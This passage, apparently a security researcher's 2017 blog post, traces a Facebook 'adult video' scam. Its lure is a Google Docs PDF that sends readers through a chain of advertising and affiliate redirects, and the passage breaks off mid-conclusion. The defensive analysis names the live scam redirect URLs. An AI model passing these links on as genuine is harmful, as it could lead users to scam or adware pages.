<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[2] </span><a href="https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[3] </span><a href="https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://dragos.com/blog/crashoverride/CrashOverride-01.pdf</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[4] </span><a href="https://nioguard.blogspot.com/2017/06/eternalpetya-ransomware-analysis.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://nioguard.blogspot.com/2017/06/eternalpetya-ransomware-analysis.html</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[5] </span><a href="https://nioguard.blogspot.com/2017/06/xdata-ransomware-attacked-users-in.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://nioguard.blogspot.com/2017/06/xdata-ransomware-attacked-users-in.html</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[6] </span><a href="https://nioguard.blogspot.com/2017/06/one-more-attack-to-ukraine-via-medoc.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://nioguard.blogspot.com/2017/06/one-more-attack-to-ukraine-via-medoc.html</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[7] </span><a href="https://nioguard.blogspot.com/2017/07/comparing-medoc-backdoors-in-176-186.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://nioguard.blogspot.com/2017/07/comparing-medoc-backdoors-in-176-186.html</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[8] </span><a href="https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[9] </span><a href="https://nioguard.blogspot.com/2017/06/chthonic-trojan-is-back-in-nation-state.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://nioguard.blogspot.com/2017/06/chthonic-trojan-is-back-in-nation-state.html</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[10] </span><a href="https://www.bleepingcomputer.com/news/security/before-notpetya-there-was-another-ransomware-that-targeted-ukraine-last-week/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.bleepingcomputer.com/news/security/before-notpetya-there-was-another-ransomware-that-targeted-ukraine-last-week/</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-30901674778737515032017-09-14T07:40:00.001-07:002017-10-30T03:01:53.853-07:00Facebook video scam continues spreading undetected<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKU2YbimEv2UUOKxwa3HReu7HLlYNfR_R2raoBuEm6zEcnaJ6_4jXCIRwL20_hgb0PFX3h9lyt202sQ4Y_UaQFDui68DbZq61VAXvskLGe74dTszWamRwEWO37Itb6yBdKXQJXZFP1lOXX/s1600/head.png" imageanchor="1"><img border="0" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKU2YbimEv2UUOKxwa3HReu7HLlYNfR_R2raoBuEm6zEcnaJ6_4jXCIRwL20_hgb0PFX3h9lyt202sQ4Y_UaQFDui68DbZq61VAXvskLGe74dTszWamRwEWO37Itb6yBdKXQJXZFP1lOXX/s640/head.png" width="640" /></a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Facebook and Google Docs continue to be used by scammers as a delivery channel for malware and adware.</span></div>
<b id="docs-internal-guid-fb266d89-80c9-f3cc-058a-cd17d6f1d309" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In October 2016, Facebook users were sent the links to supposedly adult videos </span><a href="https://securelist.com/adult-video-for-facebook-users/76387/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">[1]</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> that can be played from a fake Youtube portal only when a target downloads and install the malicious Video Plugin.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In August 2017, the same attack vector is used to spread adware </span><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://securelist.com/new-multi-platform-malwareadware-spreading-via-facebook-messenger/81590/" style="text-decoration-line: none;">[2]</a></span><span style="font-weight: normal;">.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And today, I saw the following message on my Facebook arrived from the hacked mobile Facebook app of one of my students in past. In addition to the message, I and other victim’s friends were marked in the comment to the post with a fake video.</span></div>
<b style="font-weight: normal;"></b><br />
<a name='more'></a><b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="418" src="https://lh4.googleusercontent.com/ADvJuKepAaw3sK5Ugy33wsSAQFT00sDbPLzuRXBsAIHCKPomqDFq4OS1pt_1r0j3R__Vs4ZW23DJzUihqol-07z0wQOP_7zvaWLTRoBCnjTf-k9ivmQCGxFMcIRCieIT-5SqQwer" style="border: none; transform: rotate(0rad);" width="327" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let’s figure out how this scam works.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As you can see, the link points to one Google Document:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">https://docs.google.com/file/d/0B{CENSORED}UU/preview</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">URL is detected as clean:</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOp9bVANGA_ut_p8Pb6tCLJfjgmIRvQJHKKbZStl-026a-bwC_e30yyztL2LgpL4sbasi_d-XvdqX3f6CW6k7RVyley5aUj2J7Dfc39xa0Ak21-xGBdY3PkCrxBUefs22LarNkN7yC-bQ_/s1600/vt_url.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="266" data-original-width="1077" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOp9bVANGA_ut_p8Pb6tCLJfjgmIRvQJHKKbZStl-026a-bwC_e30yyztL2LgpL4sbasi_d-XvdqX3f6CW6k7RVyley5aUj2J7Dfc39xa0Ak21-xGBdY3PkCrxBUefs22LarNkN7yC-bQ_/s640/vt_url.png" width="640" /></a></div>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Following the link (Facebook does not block it), you can see its preview.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCuYsfrLpviQ1SeG41hGzeIdzZ8HxYE5YBQ0A3j9uqKEDlBluHIJHiDohTNESVPzyKaX7npd6Dekp2PpYfEt7uTIMfAoMxLDYJ2RMIM8O6Vxczs8qDl3NOcVEppo24DHgcE-Nltowhwboh/s1600/2_1.png" imageanchor="1"><img border="0" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCuYsfrLpviQ1SeG41hGzeIdzZ8HxYE5YBQ0A3j9uqKEDlBluHIJHiDohTNESVPzyKaX7npd6Dekp2PpYfEt7uTIMfAoMxLDYJ2RMIM8O6Vxczs8qDl3NOcVEppo24DHgcE-Nltowhwboh/s640/2_1.png" width="640" /></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The document named as “Video - <Name of the victim on Facebook>”</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When downloading, you can see that the file type is PDF.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="282" src="https://lh3.googleusercontent.com/x_P-Bn4sqpZAt5k6s5sU0Sn18WLPHK9eeys-EpY4sbe6NgZO_rI5D2OOfPj56GWDVoVWKIgtaIwcMrqmU1CvHiMXAz7mGVXPeRYa6m5CCSHzH7frWjlym1wQkZSE0pgS7cy6Jvrx" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="402" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you try to click the fake Youtube-style ‘Play’ button in the center of the image, you will be first redirected to: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<a href="http://fastredirects.com/ad/33dc2458" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://fastredirects.com/ad/33dc2458</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Then to:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><a href="http://r.leadzuaf.com/?m=0BDLADULT01&a=373.790138c0ef79e169f861fbbbde4c05d8&pubid=373" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://r.leadzuaf.com/?m=0BDLADULT01&a=373.790138c0ef79e169f861fbbbde4c05d8&pubid=373</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And finally to:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<a href="http://d.billyaffcontent.com/offerNotAvailable" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://d.billyaffcontent.com/offerNotAvailable</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="328" src="https://lh4.googleusercontent.com/7irW3At0oDHgTqBRn_i60GzztQBkKiRimcQz0E98gUT6NveyCcBFltVgEthaiVRvo6WofKrFIZAv8CrQQJOjwAXSttNll6WM5UFuR3J4ZS7Zxi8iM_tJ_K9fpJp9fi4jQLC-9PMW" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It’s a pity, but scammers have no offer for me this time.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Predictably, the leadzuaf.com is registered by an advertising company called MOBUSI MOBILE ADVERTISING S.L. located in Madrid (</span><a href="https://who.is/whois/leadzuaf.com" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">WhoIs</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">).</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #f6f6f6; color: #333333; font-family: "consolas"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="239" src="https://lh4.googleusercontent.com/EwIZwyBJFCIpO268CUgLTG3dav-92P631EXqK6oVNR4IM6XPdRAl_tqw4MsBn5GGRJzU7XQ4SXp4b7LfeQMGeYIIe8FywRj5k3eacuGHtR5SQMwSbSegt9OVXqhdJwofN1X7yK_t" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let’s take a look at the downloaded PDF.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">First, we can scan it on Virustotal. The result is fascinating - 0/59 ‘No engines detected this file’.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="144" src="https://lh5.googleusercontent.com/ivjm5UsFY2_f9bKIW6TJv9gZiRCeKzISF1i9iqtelZwc3Cad_O279lMb7etAPVdafPS785iZ1zcZDHaJVbcFvvnGjrdS5jWlC7Xct2uOs916YF4ffCE_I9OMJc3r2UCBGMyI5m8Y" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">From inside, the PDF consists of only two parts: a stolen victim’s picture and URI.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Clickable JPEG image embedded into the PDF:</span></div>
</li>
</ol>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="217" src="https://lh6.googleusercontent.com/y_Vjqeypgh_BgzFKmfb7_zPDH77ihzyuTp1m-jiaIvgz5YCt7KXxYVTXas5ejdbWvN7fuRNU0Aym4CxUlSxdXQa1TqntTTEuxKTG-tBZGk-VNLtmyYBo6pUniOzGd2OoKBghKzQr" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">URI</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="71" src="https://lh6.googleusercontent.com/cj6TWOX99rwzuyJbXZuK4JNon-S1GmGkhQLRetiejC3nqwL-CfA4kD7kCD2-5NCj0BfWoqP-qqGH0VypeXzftqad0Zmudj1qPQAqT-ZqFeWC4H0MT8vCXiE3o2mcFh1GrwkfzWOq" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Two things amazed me in this attack. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
